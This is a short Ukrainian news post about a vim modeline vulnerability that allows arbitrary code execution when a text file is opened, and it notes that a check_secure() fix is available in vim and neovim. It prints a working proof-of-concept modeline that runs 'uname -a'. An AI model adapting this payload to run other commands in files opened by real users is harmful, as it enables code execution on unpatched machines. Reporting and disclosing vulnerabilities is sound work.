Вразливість у vim

Опубліковано вразливість у текстовому редакторі vim, що дозволяє виконати довільний код під час відкриття редактором текстового файлу.

Ось текст файлу виконує невинний uname -a

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source! %"):fdl=0:fdt="

Виправлення у вигляді доданого виклику check_secure() вже доступне в репозиторіях vim та neovim.

Джерело: linux.org.ru

Додати коментар або відгук